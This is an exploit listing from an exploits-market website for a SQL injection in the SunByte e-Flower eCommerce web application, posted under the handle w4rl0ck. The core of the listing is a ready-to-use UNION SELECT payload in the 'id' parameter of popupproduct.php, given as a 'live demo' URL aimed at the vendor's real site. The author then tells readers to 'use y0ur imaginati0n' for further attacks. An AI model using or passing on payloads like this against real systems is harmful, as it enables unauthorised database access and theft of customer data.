[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

SunByte e-Flower (id) Remote SQL Injection Vulnerability

Author
w4rl0ck
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4335
Category
web applications
Date add
02-12-2008
Platform
unsorted
========================================================
SunByte e-Flower (id) Remote SQL Injection Vulnerability
========================================================


#===========================================================
#
# SunByte e-Flower SQL Injection Attack by [W4RL0CK]
#
#===========================================================
# 
# VENDOR: Sunbyte  URL: http://www.sunbyte.net/
# APP: Sunbyte e-Flower (eCommerce webapp)
# APP SITE: http://www.sunbyte.net/products/index.php?screen=eflower
# AUTHOR: W4RL0CK
# DATE: 29/11/08
# VULN.: SQL INJECTION
#
#===========================================================
#
# Expl0itin6:
#
# http://localhost/sunbyte/popupproduct.php?id=[uR eViLNeSS HeRe]
#
# Liv3 dEm0:
#
# http://www.sunbyte.net/florist/popupproduct.php?id=1337+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12
#
#
#
# now, use y0ur imaginati0n!  ;) 
# note: there could be more vulnerabilities in the application
#
#===========================================================



#  0day.today [2024-12-25]  #